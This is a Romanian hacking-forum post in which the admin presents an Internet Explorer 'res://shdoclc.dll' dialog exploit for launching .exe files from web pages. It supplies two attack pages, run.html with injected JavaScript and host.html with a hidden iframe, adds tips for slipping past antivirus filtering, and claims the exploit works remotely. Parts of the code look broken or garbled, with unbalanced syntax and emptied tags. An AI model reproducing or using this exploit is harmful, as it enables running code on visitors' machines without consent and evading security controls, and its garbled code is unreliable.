Hacking Romania
Veti fi raspunzatori de utilizarea inregistrarii dumneavoastra, indiferent daca ...
Lista Forumurilor Pe Tematici
Hacking Romania | Reguli | Inregistrare | Login

POZE HACKING ROMANIA

Nu sunteti logat.
Nou pe simpatie:
Iasminica
Femeie
24 ani
Arad
cauta Barbat
24 - 52 ani
Hacking Romania / Hacking / cum deschizi .exe din pagini web  
Autor
Mesaj Pagini: 1
admin
Administrator

Inregistrat: acum 14 ani
Postari: 255
De unde provin aceste pagini si unde se află???
Hmm nimic mai simplu, astfel de mesaje sau mai bine spus pagini HTML, sunt continute într-o librărie DLL mai precis în SHDOCLC.DLL pe care o puteti găsi în directorul "....\windows\system32" (asta în sistemele windows 2000/XP).
La continutul acestui file se poate accesa din browser-ul nostru (normal, unul IIS) prin prefixul "res://"
Dacă vreti să faceti cite-un test iată unele dintre adresele ce trebuiesc digitate:
res://shdoclc.dll/world.bmp
res://shdoclc.dll/ie5.gif
si altele pe care nu stau acum să le insir.
Dacă intentionati să mergeti să vă uitati la tot ceea ce este continut în librăria DLL vă puteti folosi de programul "EXE.SCOPE";usor de găsit pe Internet.
Vă întrebati la ce foloseste toată această prefatză, cu sigurantă unii dintre voi vor să aplice imediat codul si gata, dar cred ca este necesar să se înteleagă functionalitatea reală fără a sări nici-un pasaj care s-ar putea rivela fundamental.

Asadar, unele dintre paginile continute în interiorul acestei librării DLL realizează functiuni de sistem: în câteva cuvinte unele functionalităti in IIS sunt realizate în HTML, lucru care vă va stupi poate dar este asa, nu este vina mea si nici a voastră.

Aceste pagini au posibilitatea să actioneze, chiar dacă în mod foarte usor, asupra sistemului operativ.
Acum putem trece la partea efectivă a exploit-ului nostru.
Pentru a-l crea este necesar să construim două pagini web si anume:

1) host.html: pagina "oaspete" care contine obiectul <IFRAME>

2) run.html: pagina care contine codul javascript

Cod de introdus pentru a realiza pagina run.html

Code:

<HTML>
<H1>INTERNET EXPLORER RES-DIALOG EXPLOIT</H1>
(RUN.HTML)

<P>[/i]Tentativo di apertura di una finestra di dialogo in corso...</P>

showModalDialog("base.html",dlg_par);

<script>
function oExploit(iSec) {
return {rel:"stylesheet",
readyState:"exploit",
href:injcode
};
}
oExploit.length=1;

var dlg_par={document:{
all:{tags:function (sTag) {
return sTag=="link" ? oExploit : [];
}
}
}
}

var injcode="<scr>\
var o=open(\"res://shdoclc.dll/about.dlg\",\"\",\"height=100,width=100,resizable\";\
setTimeout(function (){\
o.document.body.innerHTML=\"<object></object>\";}\
,2000);\
</scr>"

showModalDialog("host.html",dlg_par);
</script>
</HTML>

Codul javascript comandă deschiderea ferestrei "oaspete" "host.html" si îi trimite codul exploit-ului care este memorizat în variabila stringa injcode.
Codul continut în injcode lansează un file executabil .EXE creând o pagină de tip res://shdoclc.dll/about.dlg care va fi retinută de IIS ca fiind sigură.
Vazând particularitatea sintaxei codului care este trimis, iată unele racomandări de care trebuie tinut cont:

1) Sintaxa "<scr\ipt" în loc de "<script" este necesară pentru a evita controalele antivirus-ilor si un eventual filtraj din partea însăsi a IIS-ului care ar putea să-si dea seama de truc;

2) Într-ucât injcode este o variabilă stringa, atunci când va trebui introdus în interiorul său simbolul apostrofului, va trebui folosit \";

3) Pentru a îmbunătăti lectura codului a fost folosit simbolul \ pentru a separa diversele instructiuni ale codului cu reîntoarceri la capăt; în realitate stringa injcode este ca si cum ar fi scrisă toată pe o singură linie

4) Parcursul fishierului ce trebuie executat trebuie să fie:
C:/windows/calc.exe si nu C:\windows\calc.exe: recomand acest lucru foarte important si deci, atentie a nu comite erori de acest gen.
Ajunsi până la acest punct, pagina a fost realizată, o salvăm si deschidem o alta nouă!

Realizăm codul paginii "oaspete" care este foarte simplu, tinând cont că se foloseste doar de un tag IFRAME care va merge să tzintească la fereastra de dialog "inculpată" adică res://shdoclc/analyze.dlg
Codul va fi:

Code:

<html>
(HOST.HTML)
<style>
iframe {
display:none;
}
</style>
<body>
<iframe></iframe>
<h1>Exploit in corso...</h1>
</body>
</html>

Folosirea unui astfel de exploit este posibilă atât în local cât si în remote!

_______________________________________
We don't destroy computers fast we hack them low


pus acum 13 ani
   
Pagini: 1  

Mergi la